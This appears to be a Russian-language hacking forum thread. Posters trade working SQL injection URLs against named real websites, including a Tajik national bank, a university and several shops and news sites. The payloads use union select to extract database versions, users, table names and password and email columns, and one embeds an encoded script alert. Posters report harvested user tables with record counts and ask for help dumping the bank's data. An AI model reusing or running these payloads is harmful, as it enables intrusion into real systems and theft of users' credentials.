http://www.allaboutjazz.com/php/news.php?id=86311+union+select+1,2,USER(),VERSION(),5,DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* Нашел таблицу contact, может кто дальше зайдет.
Code: http://www.emotive.ru/shop/index.php?CID=-1+union+select+1,concat(version(),char(58),user(),char(58),database())-- Code: http://www.yuretz.ru/prikol.php?id=471+and+version()%3E4 Code: http://www.temporeal.com.br/produtos.php?id=-1/**/union/**/select/**/1,2,3,4,5,6,user(),version(),9,10,11,12,13,14,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33/*
GisMeteo.ru Code: http://avia.gismeteo.ru/avia.php?id=-27612+union+select+1,2,3,4,5,6,concat(convert(database()+using+cp1251),convert(char(59)+using+cp1251),convert(user()+using+cp1251),convert(char(59)+using+cp1251),convert(version()+using+cp1251))/*
http://www.recordkicks.com/uk/news_detail.php?idnew=-143+union+select+1,2,passw,4,5,6,7+from+admin/* Не смог подобрать колонку с логином
// Code: http://mkp.emokykla.lt/etnine3/1.php?id=12&level=null+union+select+1,2,concat(user(),char(59),version()),4/*
http://www.sitronics.ru/?item_id=-118+union+select+1,version( )/*-в самом низу http://www.seredina.ru/index.php?id=1&city_id=-19+union+select+version( )/* http://www.paritetk.ru/links.php?part_id=-50+order+by+2 5/* http://www.crocus-expo.ru/news/?id=-127+order+by+1 0/*
Уральский государственный экономический университет http://www.usue.ru/general/professors/?id=50%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://www.fasie.ru/index.php?pid=-1+union+select+1,0x3c7363726970743e616c65727428272a443156455227293c2f7363726970743e,3,4,5/* http://www.newdramafest.ru/news.php?nid=-1+union+select+1,2,user(),444/* http://www.dynamomania.com/news.php?p=message&id=-1+union+select+concat(email,char(58),id,char(58),pwd,char(58))+from+users/* Вывод в Титле! Пасы к форуму! Форум шляпный (( http://www.informeco.ru/sud.php?stat=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables/*
http://www.fotocopy.ru/catalog/showcd.html?id=1339' http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640' http://www.infosystems.ru/TestCenter/order.asp?TestID=5839' http://www.azs-snab.ru/answer_board.php?id=13977' --------------------------------------------------- http://www.crdf.ru/?id=-20+order+by+9/* --------------------------------------------------- http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+from+email/* http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*
http://sibron.ru/index.php?option=com_content&id=0&Itemid=0&task=section выдает ошибку: Fatal error: Call to undefined method: mosempty->set() in /var/optpart/local/apache/http/sibron.ru/ht docs/components/com_content/content.php on line 197 но если поставить кавычку в конце - всё ок в чем может быть дело? движок mambo имхо > 4.5 посоветуйте что нить плз!
http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,4,name,6,7,8,9+from+forum/* http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),user(),5,6/*
sql-inj Сайт: http://flash-gorod.net/ уязвимость: http://flash-gorod.net/files.php?cat=4' подобранные таблицы: users подобранные поля: nick,password,icq,email,city,sex 767 организмов
попалась скуль в банке таджикистана =) помогите вывести записи!!! http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
sorry глюканул чё та я. http://www.akvilon.biz/index.php?content=products&prd_id=-48+union+select+1,2,3, 4/* Таблицы: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, banners, categories, images, news, newspics, partners, prices, product_docs, products, sertificates --------------------------- http://www.uprav.biz/show_action.php?action_id=14762'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9/* -слепая инж order49
sql-inj Сайт: http://inetoncd.ru/ уязвимость: http://inetoncd.ru/catalog_order.php?hash=211638&mom=76' подобранные таблицы: clients подобранные поля: id,login,password 3392 организма
Code: http://www.nbt.tj/?c=44&id=44&a=-289+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4,5/* но таблиц чето не нашел
